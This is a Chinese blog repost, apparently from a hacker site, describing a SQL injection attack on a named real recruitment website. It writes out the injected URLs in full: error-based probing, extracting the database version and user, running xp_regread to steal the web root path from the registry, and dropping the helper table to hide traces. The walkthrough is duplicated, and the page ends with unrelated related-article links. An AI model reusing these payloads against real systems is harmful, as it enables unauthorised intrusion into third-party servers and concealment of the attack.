安全检测ASP.net网站实例:用DBO操作数据库以获得信息和数据
2008-02-02 10:01
1141 查看
骇客基地 阅读:17 时间:2008-1-29 9:59:41 来源:www.hookbase.com
------------------------------------------------------------------
今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ,然后加一个’ 看看出现什么?我晕。。
Source: .Net SqlClient Data Provider
Description: 字符串 ’’ 之前有未闭合的引号。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入 http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>(select%20@@version)-- 提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 ’Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
是个2000的Enterprise server而且SP4了。。然后 http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>user_name() 提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 ’dbo’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哦?用dbo的身份连接?应该有搞头。。
首先按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表: http://www.cnwill.com/NewsShow.aspx?id=4844;create%20table%20[dbo].[cyfd]([gyfd][char](255))-- 把web路径写进去 http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots’, ’/’ ,@result output insert into cyfd (gyfd) values(@result);--
还是让他不匹配,显示错误 http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
得到提示:
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 ’Y:/Web/烟台人才热线后台管理系统,,201 ’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哈哈哈。。路径暴露了。。
接下来删除痕迹 http://www.cnwill.com/NewsShow.aspx?id=4844;drop%20table%20cyfd;-- 后边该怎么做就不多说了。。和攻击ASP的网站一样。。
------------------------------------------------------------------
Source: .Net SqlClient Data Provider
Description: 字符串 ’’ 之前有未闭合的引号。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入 http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>(select%20@@version)-- 提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 ’Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
是个2000的Enterprise server而且SP4了。。然后 http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>user_name() 提示:
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 ’dbo’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哦?用dbo的身份连接?应该有搞头。。
首先按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表: http://www.cnwill.com/NewsShow.aspx?id=4844;create%20table%20[dbo].[cyfd]([gyfd][char](255))-- 把web路径写进去 http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots’, ’/’ ,@result output insert into cyfd (gyfd) values(@result);--
还是让他不匹配,显示错误 http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
得到提示:
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 ’Y:/Web/烟台人才热线后台管理系统,,201 ’ 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哈哈哈。。路径暴露了。。
接下来删除痕迹 http://www.cnwill.com/NewsShow.aspx?id=4844;drop%20table%20cyfd;-- 后边该怎么做就不多说了。。和攻击ASP的网站一样。。
相关文章推荐
- 1.简单实例:ASP.NET下Echarts通过Ajax从数据库中获取数据
- vs2010asp.net网站制作用户注册登录界面源代码(包含验证码)并把用户信息保存到数据库sql2008
- asp.net(C#) 上传Execl文件 并插入数据到数据库实例
- 在asp.net中使用加密数据库联接字符串保证数据安全
- asp.netWeb开发中ztree实现无极限增删改查连接数据同步数据库操作
- asp.net(C#) 上传Execl文件 并插入数据到数据库实例
- 【ASP.NET】9.解决百度富文本编辑器UEditor往后台传数据写入数据库时,出现错误:检测到有潜在危险的Request
- asp.net(C#) 上传Execl文件 并插入数据到数据库实例
- Asp.Net Core 2.0 项目实战(4)ADO.NET操作数据库封装、 EF Core操作及实例
- ASP.NET数据库操作和数据显示技术
- 在ASP.NET 2.0中操作数据之七十一:保护连接字符串及其它设置信息
- 在ASP.NET 2.0中操作数据之七十:配置数据库连接和命令等级设置
- 在ASP.NET 2.0中操作数据之七十一:保护连接字符串及其它设置信息
- 在ASP.NET 2.0中操作数据之六十一:在事务里对数据库修改进行封装
- Asp.Net : 捕捉和记录网站中出现的所有未处理错误,抛出详细的页面来源和访问ip,调用的接口方法及异常实例(记事本日志,系统日志及数据库日志)
- ASP.NET数据库操作实例
- 在ASP.NET 2.0中操作数据之十五:在GridView的页脚中显示统计信息
- 在asp.net中使用加密数据库联接字符串保证数据安全
- 在ASP.NET 2.0中操作数据之十五:在GridView的页脚中显示统计信息